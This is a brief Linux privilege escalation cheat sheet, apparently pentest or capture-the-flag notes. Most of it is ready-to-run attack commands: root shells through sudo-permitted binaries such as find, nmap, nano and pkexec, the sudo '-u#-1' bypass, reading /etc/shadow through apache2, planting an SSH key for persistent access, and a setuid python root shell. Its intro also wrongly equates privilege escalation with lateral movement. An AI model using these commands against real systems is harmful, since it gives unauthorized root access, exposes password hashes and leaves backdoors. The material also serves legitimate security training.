PRIVILEGE ESCALATION CHEAT SHEET
Privilege escalation is the step of gaining illicit access to elevated rights, or privileges beyond those a user is entitled to. The attack is performed to gain unauthorized access to the system (root). It exploits human behaviour, design flaws, or oversights in the operating system. It is also known as lateral movement in the attack chain.
Cheat Sheet
sudo -l
sudo find /bin -name nano -exec /bin/sh \;
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
sudo apache2 -f /etc/shadow
sudo su root   or   /bin/bash -p
nano: Ctrl+R, then Ctrl+X, then run: reset; sh 1>&0 2>&0
sudo pkexec /bin/sh
If sudo -l shows (ALL:!root) /bin/bash:
sudo -u#-1 /bin/bash
If apache2 appears in sudo -l:
sudo apache2 -f /etc/shadow
Docker
Stable shell as www-data (no sudo):
python -c 'import pty; pty.spawn("/bin/bash")'
Find a specific file
find / -name "*.txt" 2>/dev/null
Generate an SSH key.
Our machine:    ssh-keygen -f mykey
Target machine: echo "<contents of mykey.pub>" >> ~/.ssh/authorized_keys
chmod 600 mykey    (restrict the private key's permissions; ssh refuses to use a key readable by others)
ssh -i mykey <targetusername>@<remote IP>
SUID
find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
For a python binary flagged by getcap (here python2.6):
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Crontab
cat /etc/crontab